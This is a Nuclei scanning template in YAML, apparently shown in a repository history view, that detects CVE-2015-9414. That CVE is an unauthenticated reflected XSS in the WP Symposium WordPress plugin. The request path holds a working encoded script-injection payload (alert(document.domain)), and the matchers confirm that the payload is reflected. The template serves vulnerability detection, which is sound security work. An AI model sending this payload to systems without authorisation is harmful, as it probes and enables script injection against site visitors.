my-nuclei-templates/CVE-2015-9414.yaml

40 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-08-05 22:54:02 +00:00
id: CVE-2015-9414
info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter.
2021-09-02 08:03:02 +00:00
reference:
2021-08-05 22:54:02 +00:00
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
2022-06-18 08:05:25 +00:00
- https://wpvulndb.com/vulnerabilities/8175
- https://wordpress.org/plugins/wp-symposium/#developers
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2015-9414
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2015,wordpress,wp-plugin,xss
2021-08-05 22:54:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200